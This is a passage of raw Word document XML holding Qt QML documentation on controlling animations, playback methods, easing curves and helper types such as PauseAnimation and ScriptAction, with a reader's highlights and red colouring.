        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>transition animations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00601B99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">because </w:t>
      </w:r>
      <w:r w:rsidRPr="00601B99">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animations are played in parallel inside transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2117" w:name="qml-controlling-animations"/>
      <w:bookmarkStart w:id="2118" w:name="controlling-animations"/>
      <w:bookmarkStart w:id="2119" w:name="_Toc483000988"/>
      <w:bookmarkStart w:id="2120" w:name="_Toc483003979"/>
      <w:bookmarkStart w:id="2121" w:name="_Toc483604330"/>
      <w:bookmarkStart w:id="2122" w:name="_Toc483605550"/>
      <w:bookmarkEnd w:id="2117"/>
      <w:bookmarkEnd w:id="2118"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Controlling Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2119"/>
      <w:bookmarkEnd w:id="2120"/>
      <w:bookmarkEnd w:id="2121"/>
      <w:bookmarkEnd w:id="2122"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">different </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>methods to control animations</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2123" w:name="animation-playback"/>
      <w:bookmarkStart w:id="2124" w:name="_Toc483000989"/>
      <w:bookmarkStart w:id="2125" w:name="_Toc483003980"/>
      <w:bookmarkStart w:id="2126" w:name="_Toc483604331"/>
      <w:bookmarkStart w:id="2127" w:name="_Toc483605551"/>
      <w:bookmarkEnd w:id="2123"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animation Playback</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2124"/>
      <w:bookmarkEnd w:id="2125"/>
      <w:bookmarkEnd w:id="2126"/>
      <w:bookmarkEnd w:id="2127"/>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 xml:space="preserve">All animation types </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inherit from the</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2492" w:history="1">
        <w:r w:rsidRPr="003A41E5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not possible to create</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2493" w:history="1">
        <w:r w:rsidRPr="003A41E5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; instead, this type provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>essential properties</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and methods for animation types. Animation types have</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start()</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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stop()</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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resume()</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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pause()</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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restart()</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>complete()</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-- all of these methods </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>control the execution</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of animations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2128" w:name="qml-easing-animation"/>
      <w:bookmarkStart w:id="2129" w:name="easing"/>
      <w:bookmarkStart w:id="2130" w:name="_Toc483000990"/>
      <w:bookmarkStart w:id="2131" w:name="_Toc483003981"/>
      <w:bookmarkStart w:id="2132" w:name="_Toc483604332"/>
      <w:bookmarkStart w:id="2133" w:name="_Toc483605552"/>
      <w:bookmarkEnd w:id="2128"/>
      <w:bookmarkEnd w:id="2129"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Easing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2130"/>
      <w:bookmarkEnd w:id="2131"/>
      <w:bookmarkEnd w:id="2132"/>
      <w:bookmarkEnd w:id="2133"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Easing curves</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> define how the animation will </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41E5">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interpolate</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the start value and the end value. </w:t>
      </w:r>
      <w:r w:rsidRPr="00710B49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Different easing curves might go</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> beyond the defined range of interpolation. The easing curves </w:t>
      </w:r>
      <w:r w:rsidRPr="00710B49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplify the creation of animation effects</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as bounce effects, acceleration, deceleration, and cyclical animations.</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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00710B49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML object may have different easing curve for each property animation</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. There are also different parameters to control the curve, some of which are exclusive to a particular curve. For more information about the easing curves, visit the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2494" w:anchor="easing.type-prop" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>easing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation.</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The</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2495" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>easing example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visually demonstrates each of the different easing types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2134" w:name="other-animation-types"/>
      <w:bookmarkStart w:id="2135" w:name="_Toc483000991"/>
      <w:bookmarkStart w:id="2136" w:name="_Toc483003982"/>
      <w:bookmarkStart w:id="2137" w:name="_Toc483604333"/>
      <w:bookmarkStart w:id="2138" w:name="_Toc483605553"/>
      <w:bookmarkEnd w:id="2134"/>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Other Animation Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2135"/>
      <w:bookmarkEnd w:id="2136"/>
      <w:bookmarkEnd w:id="2137"/>
      <w:bookmarkEnd w:id="2138"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In addition, QML provides several other types useful for animation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2496" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>PauseAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: enables pauses during animations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2497" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ScriptAction</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: allows JavaScript to be executed during an animation, and can be used together with</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2498" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>StateChangeScript</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to reused existing scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2499" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyAction</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: changes a property</w:t>
      </w:r>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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>during an animation, without animating the property change</w:t>
      </w:r>
      <w:r w:rsidR="00710B49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="009C0F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu using context //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These are specialized animation types that animate different property types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2500" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="00710B49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SmoothedAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: a specialized</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2501" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
